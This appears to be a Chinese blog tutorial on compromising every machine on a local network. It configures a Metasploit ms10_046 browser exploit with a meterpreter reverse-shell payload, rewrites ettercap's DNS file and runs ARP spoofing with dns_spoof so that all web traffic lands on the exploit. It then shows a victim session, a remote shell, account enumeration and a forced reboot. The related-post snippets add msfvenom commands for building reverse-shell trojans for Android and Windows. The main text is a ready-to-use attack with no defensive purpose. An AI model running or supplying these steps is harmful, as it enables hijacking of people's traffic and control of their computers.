linux内网劫持教程,利用kali进行dns劫持入侵局域网

最新推荐文章于 2024-06-04 10:19:20 发布
最新推荐文章于 2024-06-04 10:19:20 发布
阅读量4.1k 收藏 66
点赞数 4
文章标签: linux内网劫持教程

物理主机:kali2.0 192.168.1.50

目标主机:整个局域网

24e7a9019f6d81693f51b33944599426.png

运行msfconsole

依次输入:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块

setg SRVHOST 192.168.1.50 //设置全局服务主机IP

set PAYLOAD windows/meterpreter/reverse_tcp //加载PAYLOAD攻击模块

setg LHOST 192.168.1.50 //设置攻击模块全局主机IP

exploit //攻击

这么配置只要局域网内有哪一台主机访问到http://192.168.1.50:80/这个链接就会中马。

然后修改ettercap DNS文件。

文件目录:/etc/ettercap/etter.dns

用记事本打开它。

ctrl+f 搜索

关键字:# redirect it to http://www.linux.org

这样修改一下,如图。

2271cebdb58babf5e38900212051ae74.png

# redirect it to http://www.linux.org

在下方依次添加

* A 192.168.1.50

* PTR 192.168.1.50

* .net 192.168.1.50

* .cn 192.168.1.50

* .com 192.168.1.50

然后保存即可。

4792def6e62b14b9092be49bee0c33a7.png

打开终端,运行ettercap输入如下命令:

ettercap -T -q -i eth0 -P dns_spoof -M arp

-M MAC监听

-T 脱机监听

-P 过滤筛选器

-i 使用此网络接口

eth0 本机网卡

ARP拦截局域网所有的DNS映射到本机的etter.dns中

64c249b58cb0589b2ab24e4b74d3aa25.png

列表滚动,局域网内已经有机器在打开网页。

df884d9dbe420f6defe6d04c7858fa19.png

局域网主机只要一打开网页,DNS都会映射到本机的IP上,淫荡的中马。

b425d13d93d1591fc81b0043c940efb9.png

sessions 查看,得到一台主机 192.168.1.12

dc6cbd47e54728eea3b04ab618ccad02.png

sessions -i 1 进入劫持会话

e6d1e531ff66030b93c00e54a353a91a.png

3603883d86a7531c0e869c84915d0977.png

shell -在受害者计算机上打开一个shell

net user // 查看计算机账户

netstat -ano //查看连接与开放的端口

这里可以看到192.168.1.12:1074与192.168.1.50:4444端口正在连接。

7aab0df2b17e2da860a3baff47085cfd.png

ps -列出正在运行的进程

getpid -获取当前进程 ID (PID)

3068

d120e25cc733de0765c51351ba0d44b8.png

reboot重启对方计算机,输入后已经与192.168.1.12断开连接。

金融包工头
关注
  • 4
    点赞
  • 66
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali渗透局域网机器
追风筝的孩子
05-12 1万+
一、实验环境: 靶 机:windows10台式机(可以自己搭一个虚拟机,我这里用物理机做靶机):192.168.1.114攻击机:kali虚拟机:192.168.1.116 二、msf工具基本用法: msfconsole #进入msf框架 search 相关漏洞(如search ms17_010) # 使用search命令查找相关漏洞 use exploit...
Kali Linux利用MSF生成木马入侵局域网下的电脑(详细版)
孟俊宇的博客
03-02 1509
本文详细的介绍了在Kali Linux利用MSF生成木马入侵局域网下电脑的所有命令
kali利用ettercap进行内网dns劫持
Deeeelete的博客
06-28 2344
kali(攻击机):192.168.132.144 centos8(受害机):192.168.132.109 kali下使用vim /etc/ettercap/etter.dns修改对应的配置文件,添加对应的劫持地址,*代表劫持地址,如果是想要拦截具体的地址可以用具体的url代替 开启kali下的apache服务,确保直接访问kali的ip会存在一个可视的页面,等到最终劫持对方的dns之后会直接把地址转发到我们kali下的网址上。保存退出后找到kali下的ettercap,单击打开 点击Sniff开.
如何使用kali入侵(渗透)一台windows
最新发布
cc123489ll的博客
06-04 283
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
利用Kali入侵局域网的手机
LYKymy的博客
03-30 2万+
生成木马病毒(将生成的apk文件拷贝到手机) msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录) 启动postgresql数据库 service postgresql start 启动msfconsole msfconsole 使用探测句柄 use explo...
Kali之渗透攻击
m0_64091527的博客
05-31 1961
kali渗透攻击
DNS劫持
rumil的博客
07-25 2306
DNS劫持(Domain Name System hijacking)是黑客经常使用的一种攻击方式,其原理是通过篡改DNS系统的域名解析结果,将某个域名解析到指定的IP地址,从而使得用户访问该域名所对应的网站时,被重定向到攻击者控制的虚假网站,进而实现种种欺骗行为,如钓鱼、木马下载、恶意软件等。DNS劫持的核心原理就在于篡改域名解析结果,攻击者通过某种手段获取到通信链路上的DNS信息,然后将目标域名解析到他所想要的IP地址上,从而将用户引导到自己的虚假网站。
Kali Linux网络扫描教程第一章
03-20
Kali Linux网络扫描教程第一章
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 ...9.8 Arpspoof工具
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali linux 安装 NVIDA 显卡驱动教程
09-15
Kali Linux操作系统,安装NVIDIA显卡驱动是一个重要的步骤,特别是对于那些需要利用显卡性能进行图形化界面操作或者进行大规模计算任务的用户。由于Kali Linux默认安装了开源的NVIDIA显卡驱动nouveau,这可能...
局域网入侵
03-15
菜鸟学习局域网入侵!入门技术应用,适合所有新手。
网络安全—Kali Linux之ARP欺骗和DNS劫持
Jay
03-08 1095
其应对方法只有使用HTTPS,但并不仅仅是在原有的域名HTTP的基础上切换HTTPS那么简单,还需要保障这个域名不支持HTTP访问并且没有被大范围使用HTTP访问过,如果不这样做的话会出现一个问题,运营商在DNS解析的时候并不知道这个域名是用什么协议访问的,当之前已经记录过这个域名支持HTTP访问后,不管后续是否是HTTPS访问,都会进行DNS劫持,这是如果使用的是HTTPS访问,会因为运营商的缓存服务器没有对应的SSL证书而导致请求无法建立链接,这时就会遇到请求失败的问题。(地址解析协议)的缩写。
利用kali下的msfvenom入侵电脑
热门推荐
qq_41453632的博客
10-28 3万+
需要的工具:msfvenom . msfconsole (kali里面有) msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行命令: msfconsole          (...
使用Kali linux生成木马入侵局域网安卓手机
WuHao的博客
04-02 1万+
1、首先查看本机ip,这里我本机IP地址为192.168.0.105 2、生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 输入上述命令生成木马,这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 3、启动ms...
kali实现DNS内网劫持
weixin_45822310的博客
10-12 1731
1.终端输入:systemctl start apache2 启动apach2服务,让准备的网页生效 2.终端输入:cd /var/www/html/ 到网站的根目录下方 终端输入:ls 查看,index.html就是准备好的页面 可以在浏览器输入127.0.0.1查看钓鱼界面 3.终端输入:leafpad /etc/ettercap/etter.dns 配置ettercap的配置文件 4.终端输入:ettercap -G 启动ettercap这个间人工具 ...
Kali-工具-Ettercap-内网DNS劫持
weixin_44257023的博客
07-11 3191
Ettercap Ettercap是一个综合性的间人攻击工具,它可以进行ARP欺骗DNS劫持,以欺骗方式的网络嗅探工具,主要适用于交换局域网络 准备一个网页 准备一个网页(index.html)用于当被访问的页面,将页面放到 /var/www/html/ 目录下 启动 Apache2 systemctl start apache2 启动是否成功,可以直接在kali打开浏览器,输入 127.0.0.1 访问看看 更改Ettercap工具配置 配置文件在 /etc/ettercap/ 目录如下: 打开
Kali 局域网 DNS 劫持
qq_56724121的博客
04-23 876
Kali 局域网 DNS 劫持 1. 将kali XP 桥接到物理的无线网卡并且互通 2. 修改 errtercap 的配置文件 => vim /etc/ettercap/etter.dns 3. 启动Apache服务器 service apache2 start 4. 启动 ettercap 图像化界面 => ettercap -G 5.ettercap进行接口设置 ettercap进行攻击目标设置 将扫描到的地址 网关加入t...
利用Kali Linux进行社会工程学攻击与渗透测试
Kali Linux Social Engineering 是一本专注于在Kali Linux环境进行有效、高效且组织有序的社会工程学测试和渗透测试的专业指南。该书由Rahul Singh Patel编著,适用于那些希望在信息安全领域深入理解和实践社会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值